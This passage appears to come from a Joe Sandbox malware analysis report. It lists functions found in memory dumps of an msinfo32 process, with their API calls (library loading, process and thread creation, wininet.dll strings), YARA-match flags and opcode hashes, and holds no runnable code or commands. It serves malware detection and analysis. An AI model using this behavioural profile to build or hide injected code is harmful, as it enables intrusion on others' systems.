                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: abb9a3af61bf22a983846974bbf0068275262f96517e61dfdea522d0e086db4b
                                            • Instruction ID: e9096e0dbb8a122d67b312ac93205f85488ba1f8285be471ccd9ca11b26c800c
                                            • Opcode Fuzzy Hash: abb9a3af61bf22a983846974bbf0068275262f96517e61dfdea522d0e086db4b
                                            • Instruction Fuzzy Hash: 519002216814005361407168C9449065005AFE2255755C122A0999551DC659D9665666
                                            Function 04F02F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8dd168bb56f2933cd100edc00f2f6f03f4e0413164ad4fe30765ce8267274bcf
                                            • Instruction ID: 13e36b89604744b45fc39a06817f33582dde98ecaa9c4f4a86b29838e1728558
                                            • Opcode Fuzzy Hash: 8dd168bb56f2933cd100edc00f2f6f03f4e0413164ad4fe30765ce8267274bcf
                                            • Instruction Fuzzy Hash: 539002613C140453F10071588514B061005CBE2345F55C016E1065555DC719DD536127
                                            Function 04F02AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f8827deee499855269dfe2716007195d0ccb9512f4f5bbafda23e9a16884c5a0
                                            • Instruction ID: 9b1fdeebaf325cea59198c63aaaee500101035fc6709de970cb8a2fd512810d4
                                            • Opcode Fuzzy Hash: f8827deee499855269dfe2716007195d0ccb9512f4f5bbafda23e9a16884c5a0
                                            • Instruction Fuzzy Hash: DC9002252A1400132145B558470450B14459BD7395395C016F1417591CC721D9665322
                                            Function 04F02AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8807840f6178032b2893716492d7a7702463c067b007e03b7f29bae98db878dc
                                            • Instruction ID: 66efa0b4a5db7b782b19945b3b3684bda3cf45d18f5b7bd4b46a17dcce787e91
                                            • Opcode Fuzzy Hash: 8807840f6178032b2893716492d7a7702463c067b007e03b7f29bae98db878dc
                                            • Instruction Fuzzy Hash: E8900225291400132105B558470450710468BD6395355C022F1016551CD721D9625122
                                            Function 04F02BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cc5be8304fe330250cc43fb77a0063774f0493d763f8609e3a2fa5b78a211341
                                            • Instruction ID: 6895a61acf9ed9ef769f20c9f0a145ac07ffda5548d6d4f8eb6ad9480500f62b
                                            • Opcode Fuzzy Hash: cc5be8304fe330250cc43fb77a0063774f0493d763f8609e3a2fa5b78a211341
                                            • Instruction Fuzzy Hash: 6090023128140813F1807158850464A10058BD2345F95C016A0026655DCB15DB5A77A2
                                            Function 04F02BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 99b4fe1a5b9044ca2c3e7b217ec5ecc32f2fe2ac03547a62263419db71b769c1
                                            • Instruction ID: bc07b19f3079b85a6f2e07b378f08390d6068ad3366001121747a0b0f1c00ab7
                                            • Opcode Fuzzy Hash: 99b4fe1a5b9044ca2c3e7b217ec5ecc32f2fe2ac03547a62263419db71b769c1
                                            • Instruction Fuzzy Hash: CF90023128544853F14071588504A4610158BD1349F55C012A0065695DD725DE56B662
                                            Function 04F02BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 65422dbfb82523d8bcad6c4057a0f5b0b9336849b599dc5abe7abf331c1127d2
                                            • Instruction ID: 7d4fa06aca09b5eb5624c6fee3961745a51aaf82cb2c0780b2b0e0a26fcbd2fb
                                            • Opcode Fuzzy Hash: 65422dbfb82523d8bcad6c4057a0f5b0b9336849b599dc5abe7abf331c1127d2
                                            • Instruction Fuzzy Hash: 1890023168540813F1507158851474610058BD1345F55C012A0025655DC755DB5676A2
                                            Function 04F02B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e152e6201cb68827220522f58d28e7a671042dcb98e9e286664f603a973044b4
                                            • Instruction ID: 4dc04144d1304d7a38a82761466b947f2a5e1c92504f87f4db851e11672b3230
                                            • Opcode Fuzzy Hash: e152e6201cb68827220522f58d28e7a671042dcb98e9e286664f603a973044b4
                                            • Instruction Fuzzy Hash: 7890026128240013610571588514616500A8BE1245B55C022E1015591DC625D9926126
                                            Function 04F035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6dd45aabc5e748cd4d778d24de33ca21374721a37f999914845ea910b204003b
                                            • Instruction ID: 64566728a058605f1a4f09a185b34579940a5fc51f28bc5d21a33afd55265b59
                                            • Opcode Fuzzy Hash: 6dd45aabc5e748cd4d778d24de33ca21374721a37f999914845ea910b204003b
                                            • Instruction Fuzzy Hash: 1F90023168550413F1007158861470620058BD1245F65C412A0425569DC795DA5265A3
                                            Function 04F039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0a6e50d909a1b086750edd6a6bc2e15d7c2e5367649ac78053b84ec2ebda2965
                                            • Instruction ID: bff0bd554b7ae23038e07605df28b18763b93263b82f9deb85854c3cdc7ccb0b
                                            • Opcode Fuzzy Hash: 0a6e50d909a1b086750edd6a6bc2e15d7c2e5367649ac78053b84ec2ebda2965
                                            • Instruction Fuzzy Hash: 0D9002212C545113F150715C85046165005ABE1245F55C022A0815595DC655D9566222
                                            Function 02ECEFBA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 114COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InitializeUninitialize
                                            • String ID: @J7<
                                            • API String ID: 3442037557-2016760708
                                            • Opcode ID: 87d0cb09610580fd4402b10bbdc2bd8cedcce99febf3232ab0f74cfbf26e2555
                                            • Instruction ID: ee5dc90a2fa5a505387b01aedfef44ea298da94bd37b3ac3d2e1f4f0a4767fcc
                                            • Opcode Fuzzy Hash: 87d0cb09610580fd4402b10bbdc2bd8cedcce99febf3232ab0f74cfbf26e2555
                                            • Instruction Fuzzy Hash: 934163B5A002099FDB10DFD8CC809EEB779FF49304F108559E905EB214D775AE46CBA1
                                            Function 02ED3520 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02ED35FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 3b3cd655dcb2b492e89b42c3d27b7a6b9966dfb7951a055d2cacefbf9c60d04e
                                            • Instruction ID: 34a82b9f33e38adff658a13030fc08fdb64aca9653ced8954766668474ac859b
                                            • Opcode Fuzzy Hash: 3b3cd655dcb2b492e89b42c3d27b7a6b9966dfb7951a055d2cacefbf9c60d04e
                                            • Instruction Fuzzy Hash: 9331BDB0A41605BBD714DFA4CC80FEBBBB9EB88714F04952DBA196B240D7706A41CFA1
                                            Function 02ECEFC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InitializeUninitialize
                                            • String ID: @J7<
                                            • API String ID: 3442037557-2016760708
                                            • Opcode ID: a2686c6c4529f6f93a661288d3e8f26ac995cbdbee33669be1da804460d321b9
                                            • Instruction ID: 6963e35552e47a4b3f1099fe4d9370ad8b9c82a928bb5e1d4f2454b00c674001
                                            • Opcode Fuzzy Hash: a2686c6c4529f6f93a661288d3e8f26ac995cbdbee33669be1da804460d321b9
                                            • Instruction Fuzzy Hash: AB3152B6A006099FDB00DFD8C8819EFB7BABF88704B108559E915E7214D775EE06CBA0
                                            Function 02EC7F00 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EC7EDC
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: cd54ed4095e9b31f6b64a27a4ce93c77ffc8641386dcd6915b95a27abc4d307f
                                            • Instruction ID: 99a3637b07316f576efeae59fc0b4a4dae862c527eeba5108f011ca0e8c0bc69
                                            • Opcode Fuzzy Hash: cd54ed4095e9b31f6b64a27a4ce93c77ffc8641386dcd6915b95a27abc4d307f
                                            • Instruction Fuzzy Hash: 4131BD365946814FE7259EB8CD827D47B6DEB02358F2CA2ACE865CB2C2D76084038AD0
                                            Function 02EC412B Relevance: 1.6, APIs: 1, Instructions: 114libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EC4122
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: a1ed677db0498e6de243f2045db78ee2bc9a6998461d9588c89e8df937842a96
                                            • Instruction ID: 521a6b837c62729819bcb660d82f86ef2a19fa9c56f55f6fbeab17fef0203ddd
                                            • Opcode Fuzzy Hash: a1ed677db0498e6de243f2045db78ee2bc9a6998461d9588c89e8df937842a96
                                            • Instruction Fuzzy Hash: DF31A976944206AFCB01DBB0D991BC9BB34AF52218F28D09DE84957283F231E607CBE1
                                            Function 02EC4130 Relevance: 1.6, APIs: 1, Instructions: 113libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EC4122
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8c653f4bef031480296291f3721b06dac10c38ba87bed496ed3b508604066595
                                            • Instruction ID: dfae5c122985a254e652d92436a55b8c659c3642eadd46b509671564a8c02645
                                            • Opcode Fuzzy Hash: 8c653f4bef031480296291f3721b06dac10c38ba87bed496ed3b508604066595
                                            • Instruction Fuzzy Hash: 0831AA336482459FCB06DF74D991BD9BF64EF96214F2C809DE8498B287E2329606C7E1
                                            Function 02EC40B0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EC4122
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: fa93d189cd74aa8ed59397b31af14a0738f4a82a17fd6a13deffbffab5015490
                                            • Instruction ID: 6ecf2097015a18184d9809dd7bf4d6918e3e04f7b112b52650c7c39b21b34920
                                            • Opcode Fuzzy Hash: fa93d189cd74aa8ed59397b31af14a0738f4a82a17fd6a13deffbffab5015490
                                            • Instruction Fuzzy Hash: C60152B5D8010DABDF10EBE4DD41FDEB3799B14308F1091A9A90897280F671EB15CB51
                                            Function 02ED9210 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,02EC7E6E,00000010,?,?,?,00000044,?,00000010,02EC7E6E,?,?,?), ref: 02ED9270
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 0110b3c9965cc0052c92bc0fe709acc76135c931d13cce132d46f4484137a53d
                                            • Instruction ID: f8125d4f953e738a97c6dcaaceac223bb50263054508113d095703b7b8332ad1
                                            • Opcode Fuzzy Hash: 0110b3c9965cc0052c92bc0fe709acc76135c931d13cce132d46f4484137a53d
                                            • Instruction Fuzzy Hash: 2801D2B2210108BBCB04DF99DC90EEB77ADAF8C754F408209FA09E3241D630F8518BA4
                                            Function 02EB9990 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EB99D5
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: fabcea1fb3f9b6f37822002f064e5e1b85606466b5d9ed5cfb7f4f4c64767882
                                            • Instruction ID: 08a218685ec3bdb4c59643106d3986854afc99b6fead2e7d649fee87c1593245
                                            • Opcode Fuzzy Hash: fabcea1fb3f9b6f37822002f064e5e1b85606466b5d9ed5cfb7f4f4c64767882
                                            • Instruction Fuzzy Hash: FDF065333C060436E32065A9AC02FD7779DCF847B5F185426F70CDB1C0D995B4414AE5
                                            Function 02EB998C Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EB99D5
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 5d010d1d0a2f487151a3337d461ed6933de95f494344bbb2463cc95373503bb1
                                            • Instruction ID: cb9b868ab21d37aaa28f62d74feea4f32a13a2476153bcfabc06b549ee2d5d8e
                                            • Opcode Fuzzy Hash: 5d010d1d0a2f487151a3337d461ed6933de95f494344bbb2463cc95373503bb1
                                            • Instruction Fuzzy Hash: B3F092772C060036E72066A49C03FDB62998F84795F285429F719EF2C0D9A5F4418AA9
                                            Function 02ED9180 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,02EAC10E,00000007,00000000,00000004,00000000,02EC393F,000000F4), ref: 02ED91BF
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 9446a41cf4e8f749268f82621d75c9b6eb30fdac0d99a0775b656bd5483797e1
                                            • Instruction ID: b8171f17022d7cbbe71fa04f96e6a3db3b46fdc339c66e53f7ed08c42f9cf67c
                                            • Opcode Fuzzy Hash: 9446a41cf4e8f749268f82621d75c9b6eb30fdac0d99a0775b656bd5483797e1
                                            • Instruction Fuzzy Hash: BFE06572200204BBDA14EE58DC50F9B73ADEFC9720F408019F908E7240CA30BA118BF5
                                            Function 02ED9130 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(02EC15B9,?,02ED5742,02EC15B9,02ED510E,02ED5742,?,02EC15B9,02ED510E,00001000,?,?,00000000), ref: 02ED916F
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: e02dd31f354a9ea71caa4f52f872791da712f704d7f30e44db72aea6471fb5dc
                                            • Instruction ID: aa2399e58ab3360373a3edb41f1f42d1696b1673a0b0ca0ede7daa29325dd2ef
                                            • Opcode Fuzzy Hash: e02dd31f354a9ea71caa4f52f872791da712f704d7f30e44db72aea6471fb5dc
                                            • Instruction Fuzzy Hash: F0E06572210218BFEA14EE59DC45F9B33ADEF89720F408019F908A7241DA31B9118BB8
                                            Function 02EC7EB0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EC7EDC
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 639206bff8dd8664d1a39c6163783634c9090dbc0455b1b26a15b7f6b45cc83b
                                            • Instruction ID: eb100f396ad68c3e92f28cace535d94364fdba4cf4cfd8e99f4e33f2854af341
                                            • Opcode Fuzzy Hash: 639206bff8dd8664d1a39c6163783634c9090dbc0455b1b26a15b7f6b45cc83b
                                            • Instruction Fuzzy Hash: 3CE048761802041BF72499E89D45B76335C8748668F289968B91CDF1C1E679E9128554
                                            Function 02EC7EA9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02EC7EDC
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 61ff0e1c8f8df94fea5a3564e6fb32edc910922d6ef6882b4cdc0d615ad258fa
                                            • Instruction ID: 95b7c98e0edfc6163e457c6b2fd13752bc8a00286079c0d2257cdcae86326c6d
                                            • Opcode Fuzzy Hash: 61ff0e1c8f8df94fea5a3564e6fb32edc910922d6ef6882b4cdc0d615ad258fa
                                            • Instruction Fuzzy Hash: 43E0D8B65C02002FFB24DAB8CC45FB6336C8B48758F38862CB858DF1D1E635D8028D50
                                            Function 02EC7C98 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02EC18A0,02ED7A4F,02ED510E,02EC186D), ref: 02EC7CD3
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 0cb258008b96b5b140ce4d5882fd9889ae7d581bf374471b4d08b6187631bccf
                                            • Instruction ID: 9989daff6e00d10102bbdc3de8f1d0239ca1a4446033cca54fc924ae0792bcbb
                                            • Opcode Fuzzy Hash: 0cb258008b96b5b140ce4d5882fd9889ae7d581bf374471b4d08b6187631bccf
                                            • Instruction Fuzzy Hash: 83E0C2356C02013FF310EAF4DC46FA6325EAB48364F189034F90CDF7C2EA25E1104999
                                            Function 02EC098B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111), ref: 02EC0997
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                            • Instruction ID: 2b354e1377c6a7662630d8f9d26b95eb14b9a700e294afb82cd89f97ef6456aa
                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
